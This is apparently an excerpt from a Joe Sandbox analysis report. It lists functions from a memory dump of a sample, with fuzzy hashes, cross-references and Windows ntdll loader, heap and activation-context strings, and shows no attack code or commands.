Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 57f9e2368cf5f72ecec46df63d4cde83588a3a8b78151282f6406af84baef4e4
Instruction ID: 7537a82a8e131cad78672f7e74f2294a54b8d3dd5dd4ed9adf742d8944018fbc
Opcode Fuzzy Hash: 57f9e2368cf5f72ecec46df63d4cde83588a3a8b78151282f6406af84baef4e4
Instruction Fuzzy Hash: FA31C436B413257BE7219B9A8D82F6A7A78DBE5A50F05405EFB08A7240D270EE00C7E1

Function 01A0096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01A02DF0: LdrInitializeThunk.NTDLL ref: 01A02DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A00BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A00BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A00D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A00D74

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 610695840dfd13e3c01f076459ff11508a2563a38d24598d81baa8dc13328128
Instruction ID: db3a4559c10a9ebeebf455f9517d55dfa66de6f5dc11ee3e399df6094bbeb9c4
Opcode Fuzzy Hash: 610695840dfd13e3c01f076459ff11508a2563a38d24598d81baa8dc13328128
Instruction Fuzzy Hash: 12427D71900705DFDB62CF28C980BAAB7F4FF44314F1445AAE989EB281D770AA85CF61

Function 019CA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Exit, xrefs: 019CA3FF
8, xrefs: 019CA3E7
LdrResFallbackLangList Enter, xrefs: 019CA3EF
6, xrefs: 019CA3F7

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 5f4213737beb19907425def169131bb7d07df1b3f4e7ddd5446f0d5ea3aa1552
Instruction ID: 20205a103b5c0069b51e32b7d90af523722215402ddd40cfba7d4d7a59dd23dd
Opcode Fuzzy Hash: 5f4213737beb19907425def169131bb7d07df1b3f4e7ddd5446f0d5ea3aa1552
Instruction Fuzzy Hash: FDC17B7420838A8FD711CF58C544B6AB7E4BF94B04F04896EF9DA8B291E734CA49CB57

Function 019F8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 019F8421
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 019F855E
LdrpInitializeProcess, xrefs: 019F8422
@, xrefs: 019F8591

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: dec65d88095baff68f5be4cc909d8bf04d51ac8c60f230b22ee782849beb534d
Instruction ID: ed92cff31b89cc0467932bd0e709511f1b17b014bf5ab90d5ab15856e4038679
Opcode Fuzzy Hash: dec65d88095baff68f5be4cc909d8bf04d51ac8c60f230b22ee782849beb534d
Instruction Fuzzy Hash: 6D917C71548345BFEB22EF65CD44FABBAECBF84754F40092EFA8892151E334D9048B62

Function 019F273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context, xrefs: 01A321DE
.Local, xrefs: 019F28D8
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01A321D9, 01A322B1
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01A322B6

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 6a2ff2937e57994fe0f14c036f7dd6680aafe0f103af1adf73106dcf7be79061
Instruction ID: 0a835d62205f6330645d97c81e1b311a562a0da3d1edc5d4c81fd69bfd3093cb
Opcode Fuzzy Hash: 6a2ff2937e57994fe0f14c036f7dd6680aafe0f103af1adf73106dcf7be79061
Instruction Fuzzy Hash: DCA19031901229ABDB24CF98CD84BA9B7B4BF58314F2441EAEA08A7251D730DEC0CF90

Function 019F4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

RtlDeactivateActivationContext, xrefs: 01A33425, 01A33432, 01A33451
SXS: %s() called with invalid flags 0x%08lx, xrefs: 01A3342A
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01A33437
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01A33456

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: bfa44b4a4e880013c32fcfad92217210373a14ac9cdbf4abf34cd02e4cf61508
Instruction ID: 243f131d549013cc928f6d38c37f8bbb8b56fba587fe89f5fcedb9d55659ea35
Opcode Fuzzy Hash: bfa44b4a4e880013c32fcfad92217210373a14ac9cdbf4abf34cd02e4cf61508
Instruction Fuzzy Hash: DE610336614712ABDB22CF1DC841B2AB7E5BFC0B62F15851DFA599B242D730E801CBD1

Function 019C64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01A210AE
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01A20FE5
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01A2106B
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01A21028

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: cb698fd463fb65de3ba605b3aa83a0a811e770ad98a33caf913854a49f8699c2
Instruction ID: cf49ea2d26edbecb69802858c6491c824447e7d6ddf633d60824269772b05e78
Opcode Fuzzy Hash: cb698fd463fb65de3ba605b3aa83a0a811e770ad98a33caf913854a49f8699c2
Instruction Fuzzy Hash: BA71B1719043459FCB21DF18C984F977FA8AFA4B64F50046CF9888B286D734D589CBD2

Function 019E245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01A2A9A2
apphelp.dll, xrefs: 019E2462
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01A2A992
LdrpDynamicShimModule, xrefs: 01A2A998

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 4a64d344f78d25da48886b3695f275dc725f06ffeede359f17abadda08537335
Instruction ID: 29b56b4b114a4cf3a382bacf34119c5c1c4795421b293cfef1463fe9301a6483
Opcode Fuzzy Hash: 4a64d344f78d25da48886b3695f275dc725f06ffeede359f17abadda08537335
Instruction Fuzzy Hash: F0316D7AB00251ABDB32DF9ED8C5E6A77B9FFC4B00F150419F905A7256D7706982C780

Function 019D29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 019D3264
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 019D327D
HEAP[%wZ]: , xrefs: 019D3255

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: e39f23a793178a41de65abd7177f57e9e7eded70c7dddb97ff36674a23235664
Instruction ID: 494d24020a688c57a50c2ca3789ae33d2691f9e4d6e9f1da675266b7669fc67e
Opcode Fuzzy Hash: e39f23a793178a41de65abd7177f57e9e7eded70c7dddb97ff36674a23235664
Instruction Fuzzy Hash: 2492CC71A042499FDB25CF68C440BAEBBF5FF48301F18C499E959AB392D734AA41CF51

Function 019D0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 01A250CA
HEAP: , xrefs: 01A250BD
HEAP[%wZ]: , xrefs: 01A250AE

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 960fd715935bfb38d5aacd6b55f706996eb0c419d2b4b622204f0850904ac7e1
Instruction ID: fb8f169dad767b8a0cb5bd7f53441ebcc2ca7a25fad8f703e26dd47d4a553ee4
Opcode Fuzzy Hash: 960fd715935bfb38d5aacd6b55f706996eb0c419d2b4b622204f0850904ac7e1
Instruction Fuzzy Hash: 10F1BC70A00606DFEB25DF6CC984FAAB7B5FF45304F188168E51A9B392D734E981CB91

Function 019E6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 019E6C24
, xrefs: 01A2CA51

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: 607451c12ca255099924a64f608d7bdaa4c2ef0bfe2fd90cd56cfe517ebd9023
Instruction ID: 3e4fbe2807b6f57ae43b1f67b5670114958cba57961209e31c1bbb68e7b301df
Opcode Fuzzy Hash: 607451c12ca255099924a64f608d7bdaa4c2ef0bfe2fd90cd56cfe517ebd9023
Instruction Fuzzy Hash: D2C280716083519FDB2ACF68C884BABBBE5AF88754F04892DE98DC7241D734D845CB93

Function 019BA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

FilterFullPath, xrefs: 01A1C2E6
UseFilter, xrefs: 019BA1C1
\??\, xrefs: 01A1C1E4

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: ec5831c4e9d3e9201571ba2db397ffc9d80fb866b7c68be1a29d14f129df288e
Instruction ID: ccb605129c3fb1139c2ac65e5f7fafcf51a8ece649d3018d162563b04aaa1a8c
Opcode Fuzzy Hash: ec5831c4e9d3e9201571ba2db397ffc9d80fb866b7c68be1a29d14f129df288e
Instruction Fuzzy Hash: 74A17B759516299BDB31EF68CC88BEAB7B8EF48710F0001EAE90CA7254D7359E84CF50

Function 019E0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01A2A121
LdrpCheckModule, xrefs: 01A2A117
Failed to allocated memory for shimmed module list, xrefs: 01A2A10F

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: d3a6c31f93532b93ed95ee91b00efe0fccbac90e482d9eec9fa103acbacc89e3
Instruction ID: 77ae6dc4c3ef1a4ae0aab7802fc19d2a2947c0aa5ab6a03d9c714508ddcc045f
Opcode Fuzzy Hash: d3a6c31f93532b93ed95ee91b00efe0fccbac90e482d9eec9fa103acbacc89e3
Instruction Fuzzy Hash: 1671C074E00205DFDB26DFACC984AAEB7F5FB88704F18442DE90AE7652D774A942CB50

Function 019D0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 01A2534D
HEAP: , xrefs: 01A25342
HEAP[%wZ]: , xrefs: 01A25335

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 1fab86c11b3230a7bd94d38cdbf350e5649ef8e191bca7fb3234051befbae92b
Instruction ID: 331df2ae0b90d322f2efa599a06d31ac53f8f64a1381f4df0d473566c6c89de1
Opcode Fuzzy Hash: 1fab86c11b3230a7bd94d38cdbf350e5649ef8e191bca7fb3234051befbae92b
Instruction Fuzzy Hash: 4E61C030A04301DFEB29CF28C584BAABBE5FF45704F18C559E4998F292D774E881CB91

Function 019FC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01A382E8
Failed to reallocate the system dirs string !, xrefs: 01A382D7
LdrpInitializePerUserWindowsDirectory, xrefs: 01A382DE

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: f0232c1cbb49dd5b08f719108fdffec12f2aa318ccc8e9649c22e9be7ec5a32a
Instruction ID: d5e7bc19a5e2b5aa574ac5ae834d7c86faeaab756ec2484395c7620625874312
Opcode Fuzzy Hash: f0232c1cbb49dd5b08f719108fdffec12f2aa318ccc8e9649c22e9be7ec5a32a
Instruction Fuzzy Hash: F641E1B5504345ABDB21EB68D984F5B77E8EF84750F00892EFA4CD32A2E774D8018B91

Function 01A7C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 01A7C212
@, xrefs: 01A7C1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01A7C1C5

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 440693d7e4a89c2c0a18f4d0e964d1b3f3a0b619976bbe872bb0d4cde2e599c4
Instruction ID: 04a9232a5dae39f91e90024bad4b63b9daeab7059fc7bbf579b96edf21437f5b
Opcode Fuzzy Hash: 440693d7e4a89c2c0a18f4d0e964d1b3f3a0b619976bbe872bb0d4cde2e599c4
Instruction Fuzzy Hash: D1416471D0020AEBDB11EFD8CC55BEEB7B8AB54714F14406AE609F7284E7749B448B90

Function 01A54144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Enter, xrefs: 01A54160
@, xrefs: 01A54225
LdrpResValidateFilePath Exit, xrefs: 01A54172

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 56299fcb6c11285557ce84c705ed0ed9ff180a0aee89dd1648e42d7fdaa5fec2
Instruction ID: 3215c5e31ab71d4e047b34308684a7aeeea44dbe4b9e62985fc7d9a6095883c9
Opcode Fuzzy Hash: 56299fcb6c11285557ce84c705ed0ed9ff180a0aee89dd1648e42d7fdaa5fec2
Instruction Fuzzy Hash: 08414771A087588BEB26DBD9C944BADBBF4FF99380F14005ADD05EB381E7348981CB51

Function 01A44755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 01A44899
LdrpCheckRedirection, xrefs: 01A4488F
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01A44888

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 0bddbd1c7723b96c58115eb10722aed6aa17eea0feaecc59fdc784326be7f911
Instruction ID: 3a17d177ecc2c47ded605573a816b5f0ff13dba7896eeb0aafde3e0fba5187b3
Opcode Fuzzy Hash: 0bddbd1c7723b96c58115eb10722aed6aa17eea0feaecc59fdc784326be7f911
Instruction Fuzzy Hash: 8841AF72A047919BEB22CF6CD941B667BE4AFCDA50F190569ED48A7212E730D801CB91

Function 019D0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01A25449
HEAP: , xrefs: 01A2543E
HEAP[%wZ]: , xrefs: 01A25431

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 0f0cad0682398b2912e813f8b1fba49fe4ed93b463cfa47e7c75d9576d002bf9
Instruction ID: 9b0a22c22bdd872f6502125ae9f1799be72eb3827a8179c4d81eb5a87ab3a0b0
Opcode Fuzzy Hash: 0f0cad0682398b2912e813f8b1fba49fe4ed93b463cfa47e7c75d9576d002bf9
Instruction Fuzzy Hash: 6E11DF317181529FEB29CA1DC884FBAF7A6FF8062AF188159F40ACB292DB34D841C750

Function 01A420DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

LdrpInitializationFailure, xrefs: 01A420FA
minkernel\ntdll\ldrinit.c, xrefs: 01A42104
Process initialization failed with status 0x%08lx, xrefs: 01A420F3

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 71e7cbd1dd22e9de96be903969ce0020fb7365d40ecfa3dc58f7f43e9c8d474d
Instruction ID: a8e21f2f927a2a47cf0d54a5acc25356e3e96c28f612aa2f6f79c6824ae2fc00
Opcode Fuzzy Hash: 71e7cbd1dd22e9de96be903969ce0020fb7365d40ecfa3dc58f7f43e9c8d474d
Instruction Fuzzy Hash: FDF0FC356403487BEB24D74CDD46F957768FBC4B54F500069F70477281D1F0A945C691

Function 019D03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01A24D8A

Strings

#%u, xrefs: 01A24D82

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: ba6036c53deec1976a2ec9d9c093c22c341685c8361b276c2f0998a83628f71b
Instruction ID: 6b5bb7cc6cb0ce8b02857efdfd93bfb713d3cbe4dfd6ee56169221ba1413cd87
Opcode Fuzzy Hash: ba6036c53deec1976a2ec9d9c093c22c341685c8361b276c2f0998a83628f71b
Instruction Fuzzy Hash: 6B7159B1A0014A9FDB01DFA8C990FAEBBF8FF58704F144065E905E7251EA74EE05CBA1

Function 019CA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Exit, xrefs: 019CAA25
LdrResSearchResource Enter, xrefs: 019CAA13

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: a60e87a9e081a0ef66e426b9c518d083d0b1132df8410e77569a3342cc0c5dd2
Instruction ID: 6bec9b9bc394089ee13592f969a41ab15ef8954927d00ab98457b37e0486713c
Opcode Fuzzy Hash: a60e87a9e081a0ef66e426b9c518d083d0b1132df8410e77569a3342cc0c5dd2
Instruction Fuzzy Hash: C0E1A271E0421D9FEF22CF9DC940BAEBBBABF49750F14442AE945E7241E7389940CB51

Function 01A8A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 01A8A551
`, xrefs: 01A8A44B

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 7a0cea0dc5a66d6036798dd3bdda28ea0472c823189d47b18c12550c3928bf6d
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: A0C1CF312043429BEB25EF28C841B6BBBE5AFC4318F084A2EF696CB291D778D545CB51

Function 01A3E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 01A3E75A
UEFI, xrefs: 01A3E751

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 9fc6bd995607e78b43e9d0afd65e7739ea84adfd7492b2b155d1803f35244f82
Instruction ID: 7f71d8067389061673f5a8f4a7a7b972bf7aa8f37ca5f2cb1c127fcfc66437aa
Opcode Fuzzy Hash: 9fc6bd995607e78b43e9d0afd65e7739ea84adfd7492b2b155d1803f35244f82
Instruction Fuzzy Hash: B4613871E003199FDB26DFA9C940BAEBBF9FB88700F14406DE649EB291D731A940CB50

Function 01A643D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

MUI, xrefs: 01A64525
@, xrefs: 01A64437

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: 88a0d45a1cd784817eb534a05298615686172c43aacf829fa88fa30eea899040
Instruction ID: 3f8f1eb0d055d4cf7310bb183c45a5f6decabd00058bfdad9ccac46ee22398a9
Opcode Fuzzy Hash: 88a0d45a1cd784817eb534a05298615686172c43aacf829fa88fa30eea899040
Instruction Fuzzy Hash: 6B512AB1D0021DAFEF11DFA9CD84AEEBBBCEB48754F10052AE615B7290D6309E05CB60

Function 019C04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 019C063D
kLsE, xrefs: 019C0540

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 2355e73b6ed139be827d7f7f3b6c71b44d36835a1359ce5e23fa3d1fe729c890
Instruction ID: a69bdf3bf4ebe901e99f8e134e154f6962f112c4375989075dfe8b4536dc7344
Opcode Fuzzy Hash: 2355e73b6ed139be827d7f7f3b6c71b44d36835a1359ce5e23fa3d1fe729c890
Instruction Fuzzy Hash: B151CD79500742CBD724DF39C6446A7BBE8AF84B05F18493EE6DE87241E7309545CF92

Function 019CA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 019CA309
RtlpResUltimateFallbackInfo Enter, xrefs: 019CA2FB

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: abf3336140e23ce22d53dfc13697fb0ab6f1d386a916b5e9b02a8eef5ae7f0b3
Instruction ID: bba06430f9a564b38d48f745625aef9221cc2bf79c5617ce9089c9e7d9c3563f
Opcode Fuzzy Hash: abf3336140e23ce22d53dfc13697fb0ab6f1d386a916b5e9b02a8eef5ae7f0b3
Instruction Fuzzy Hash: 6741D371A04659DFEB15CF6DC450B6E7BB4FF84B00F14446AE948DB291E3B5DA00CB52

Function 019FA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

